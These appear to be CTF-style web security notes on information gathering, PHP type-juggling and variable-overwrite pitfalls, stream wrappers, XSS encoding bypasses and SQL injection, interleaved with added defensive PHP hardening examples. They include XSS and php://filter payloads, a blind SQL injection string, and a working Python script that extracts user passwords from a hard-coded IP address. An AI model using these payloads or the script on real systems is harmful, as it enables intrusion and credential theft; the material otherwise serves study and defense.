Random web notes
Information gathering
.git
.svn
robots.txt
.swp (vim swap file)
Archive files
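A pre-deployment check for the artefacts in this list, written as an added example (it is not part of the original notes): it walks a web root for exposed .git/.svn directories, vim .swp files and archives, and pulls out the Disallow lines of robots.txt so the paths it advertises can be reviewed. The document root path, the archive suffix list and PHP 8 (for str_ends_with) are assumptions.

```php
<?php
// Added example, not from the original notes. Scans a web root for files that
// leak source or history before the site goes live. $docroot is assumed.

const EXPOSED_DIRS = ['.git', '.svn'];
// Archive suffixes are a constructed list; extend it to match your deploy tooling.
const EXPOSED_SUFFIXES = ['.swp', '.zip', '.tar', '.tar.gz', '.tgz', '.rar', '.7z'];

// Returns every path under $docroot that is a VCS directory, a vim swap file
// or an archive. Directories named in EXPOSED_DIRS are reported once and their
// contents are not listed separately.
function find_exposed(string $docroot): array {
    $hits = [];
    $dirs = new RecursiveDirectoryIterator($docroot, FilesystemIterator::SKIP_DOTS);
    // Do not descend into .git/.svn once they have been reported.
    $filter = new RecursiveCallbackFilterIterator($dirs, function ($current, $key, $iterator) use (&$hits) {
        if ($current->isDir() && in_array($current->getFilename(), EXPOSED_DIRS, true)) {
            $hits[] = $current->getPathname();
            return false;
        }
        return true;
    });
    foreach (new RecursiveIteratorIterator($filter) as $path => $info) {
        $name = $info->getFilename();
        foreach (EXPOSED_SUFFIXES as $suffix) {
            if (str_ends_with($name, $suffix)) {
                $hits[] = $path;
                break;
            }
        }
    }
    sort($hits);
    return $hits;
}

// robots.txt is meant to be public, so every Disallow line is a path an
// outsider will read first; return them for review.
function robots_disallows(string $docroot): array {
    $file = $docroot . '/robots.txt';
    if (!is_file($file)) {
        return [];
    }
    $lines = file($file, FILE_IGNORE_NEW_LINES);
    return array_values(preg_grep('/^\s*Disallow:/i', $lines));
}

// Usage (the path is an assumption):
$docroot = $argv[1] ?? '/var/www/html';
foreach (find_exposed($docroot) as $hit) {
    echo "exposed: $hit\n";
}
foreach (robots_disallows($docroot) as $line) {
    echo "robots.txt advertises: $line\n";
}
```

Run it against the build output rather than the live server; anything it reports should be removed from the artefact or denied at the web server.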
PHP
Variable overwriting
extract()
$$k
trim() strips whitespace, except 0xf
parse_str() parses a string into variables
== does not require equal types; === requires the types to match as well
sha1() returns NULL when hashing fails
switch without break
array converted to int gives 0 or 1
0e scientific notation
strings beginning with 0x are read as hexadecimal
%00 truncation
two number parameters can bypass the second one
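The PHP pitfalls above, each shown as the weak check beside a hardened one. This is an added example, not code from the original notes; the function names, the request shapes and the stored hash values are constructed for illustration (the "0e" hashes are the well-known md5 outputs of "240610708" and "QNKCDZO").

```php
<?php
// Added example, not from the original notes. Each weak_* function shows the
// pattern the note warns about; the hardened_* function next to it is the fix.

// --- Variable overwriting: $$k / extract() / parse_str() ---
function weak_is_admin(array $request): bool {
    $is_admin = false;
    foreach ($request as $k => $v) {   // ?is_admin=1 redefines the local variable
        $$k = $v;
    }
    return (bool)$is_admin;
}

function hardened_is_admin(array $request, array $session): bool {
    // Privilege comes from server-side state; request keys are read by name
    // and never turned into variable names. If extract() must be used,
    // EXTR_SKIP at least leaves existing variables untouched.
    extract($request, EXTR_SKIP);
    return ($session['role'] ?? 'user') === 'admin';
}

// parse_str() with one argument (removed in PHP 8) wrote every pair into the
// caller's scope; always collect into an array instead.
function parse_query(string $qs): array {
    parse_str($qs, $params);
    return $params;
}

// --- Loose comparison and "0e" scientific notation ---
// With == two strings that both look like 0e<digits> compare as 0 == 0.
function weak_hash_check(string $stored, string $given): bool {
    return md5($given) == $stored;
}

function hardened_hash_check(string $stored, string $given): bool {
    // Strict, constant-time comparison of the two hex strings.
    return hash_equals($stored, md5($given));
}

// --- sha1()/md5() handed an array ---
// PHP 7 returns NULL with a warning, so NULL == NULL passes for ?a[]=1&b[]=2;
// PHP 8 throws a TypeError instead. Check the type before hashing.
function weak_pair_check($a, $b): bool {
    return $a !== $b && sha1($a) == sha1($b);
}

function hardened_pair_check($a, $b): bool {
    if (!is_string($a) || !is_string($b)) {
        return false;
    }
    return $a !== $b && hash_equals(sha1($a), sha1($b));
}

// --- array converted to int ---
// (int)[] is 0 and (int)[1, 2] is 1, so an unexpected array can satisfy a
// numeric check; require a scalar made only of digits.
function hardened_int(mixed $v): ?int {
    return is_scalar($v) && ctype_digit((string)$v) ? (int)$v : null;
}

// Usage with constructed values (md5("240610708") is the stored hash):
var_dump(weak_hash_check('0e462097431906509019562988736854', 'QNKCDZO'));
var_dump(hardened_hash_check('0e462097431906509019562988736854', 'QNKCDZO'));
var_dump(hardened_int(['1']));
```

The weak hash check accepts the mismatched password because both md5 strings begin with 0e; hash_equals compares them byte by byte and rejects it.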
PHP pseudo-protocols (stream wrappers)
a=data:text/plain,<?php>
php://input does not work with enctype="multipart/form-data"
php://filter/read=string.tolower/resource=test.php
include_once("flag.php");
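An include that cannot be pointed at the wrappers listed above, added here as an example (not the notes' own code). The template directory and the page allow-list are assumptions.

```php
<?php
// Added example, not from the original notes. TEMPLATE_DIR and ALLOWED_PAGES
// are assumptions standing in for a real application.

const TEMPLATE_DIR = __DIR__ . '/templates';
const ALLOWED_PAGES = ['home', 'about', 'contact'];

// Weak: whatever the stream layer understands is accepted, so
// php://filter/read=string.tolower/resource=config.php returns source and a
// data: URI runs as code when allow_url_include is on.
function weak_include(string $page): void {
    include_once($page . '.php');
}

// Hardened: a short name is mapped to a file through an allow-list, and the
// resolved path must still sit inside TEMPLATE_DIR. php://, data:, ../ and
// %00 never reach include() because the raw input is never used as a path.
function hardened_include(string $page): bool {
    if (!in_array($page, ALLOWED_PAGES, true)) {
        return false;
    }
    $base = realpath(TEMPLATE_DIR);
    $path = realpath(TEMPLATE_DIR . '/' . $page . '.php');
    if ($base === false || $path === false) {
        return false;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return false;
    }
    include_once $path;
    return true;
}

// Usage: unknown names fall back to the default page.
if (!hardened_include($_GET['page'] ?? 'home')) {
    hardened_include('home');
}
```

Keep allow_url_include=Off in php.ini as well; the allow-list is what stops local tricks, the ini setting stops remote ones.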
Deserialization
Session deserialization: upload a file whose name is the serialized payload
hackbar
XSS
Bypasses
"data:text/javascript,alert(3);"
us-ascii
utf-7
multi-byte gbl
Wide bytes
%3c%27 alert(1) //
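Output handling that defeats the bypasses above, added as an example (not from the notes): the utf-7, us-ascii and wide-byte tricks rely on the browser guessing the page encoding, the %3c%27 payload relies on an unencoded quote, and the data: URI relies on user input reaching href. The parameter names and the page fragment are constructed.

```php
<?php
// Added example, not from the original notes. $name and $next are constructed
// request parameters.

// Declaring the charset removes encoding sniffing, so utf-7 or GBK sequences
// are never reinterpreted as markup.
header('Content-Type: text/html; charset=UTF-8');

function esc(string $s): string {
    // ENT_QUOTES encodes both quote characters, so a %27 breakout inside an
    // attribute fails; ENT_SUBSTITUTE replaces malformed UTF-8 instead of
    // returning an empty string.
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Only http(s) absolute URLs or same-site paths may land in href, so
// data:text/javascript,... and javascript: are replaced.
function safe_url(string $url): string {
    if ($url !== '' && $url[0] === '/' && ($url[1] ?? '') !== '/') {
        return $url;   // local path, not protocol-relative
    }
    $scheme = strtolower((string)parse_url($url, PHP_URL_SCHEME));
    return in_array($scheme, ['http', 'https'], true) ? $url : '#';
}

$name = $_GET['name'] ?? 'guest';
$next = $_GET['next'] ?? '/';

echo '<p>Hello, ' . esc($name) . '</p>';
echo '<a href="' . esc(safe_url($next)) . '">continue</a>';
```

The order matters: safe_url decides whether the value is allowed at all, esc decides how it is written into the attribute.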
Deserialization
Session deserialization: a file can be created on the remote host first
information_schema layout (desc information_schema):
schemata: schema_name
tables: table_schema, table_name
columns: table_name, column_name
?id=1' and ord(mid('select table_name from information_schema.tables limit 1,1',1,1))>11%23
import requests
import base64


def send(url, key1, value1):
    # The target expects the field base64-encoded
    value1 = base64.b64encode(value1.encode()).decode()
    data = {key1: value1}
    response = requests.post(url, data=data)
    content = response.text
    # "Alix" appears in the page only when the injected condition is true
    return "Alix" in content


def main():
    found = ""
    # One character position per outer iteration
    for i in range(1, 80):
        # Try each ASCII code for this position
        for j in range(1, 123):
            _username = "nothing' or ascii(mid((select group_concat(password) from users), %d, 1))=%d#" % (i, j)
            _password = "amin"
            print(_username)
            if send('http://128.199.224.175:24000/', 'spy_name', _username):
                found += chr(j)
                print(found)
                break


if __name__ == "__main__":
    main()
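The server side of the login the script above probes, as an added example that is not part of the original notes: the query built from the decoded field beside a parameterised one. The users table and password column follow the payload, the spy_name field and its base64 encoding follow the script; the in-memory SQLite database and the row in it are constructed.

```php
<?php
// Added example, not from the original notes. The schema and row are
// constructed so the file runs stand-alone with pdo_sqlite.

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE users (username TEXT, password TEXT)");
$pdo->exec("INSERT INTO users VALUES ('Alix', 'constructed-secret')");

// Weak: the decoded field is spliced into SQL, so a value such as
//   nothing' or ascii(mid((select ...), 1, 1))=65#
// turns the WHERE clause into a true/false oracle, and the username echoed
// back ("Alix") leaks one bit per request.
function weak_lookup(PDO $pdo, string $spy_name): ?string {
    $sql = "SELECT username FROM users WHERE username = '$spy_name'";
    $row = $pdo->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row['username'] ?? null;
}

// Hardened: the value is bound as data, never parsed as SQL, and the response
// reveals nothing beyond found / not found.
function hardened_lookup(PDO $pdo, string $spy_name): bool {
    $stmt = $pdo->prepare("SELECT 1 FROM users WHERE username = :name");
    $stmt->execute([':name' => $spy_name]);
    return $stmt->fetchColumn() !== false;
}

// Strict base64 decoding: malformed input becomes an empty string rather than
// being passed through partially decoded.
$spy_name = base64_decode($_POST['spy_name'] ?? '', true) ?: '';
echo hardened_lookup($pdo, $spy_name) ? "found\n" : "not found\n";
```

The per-request marker the script keys on ("Alix" in the body) is the second half of the problem; a uniform response, not only the prepared statement, is what takes away the oracle.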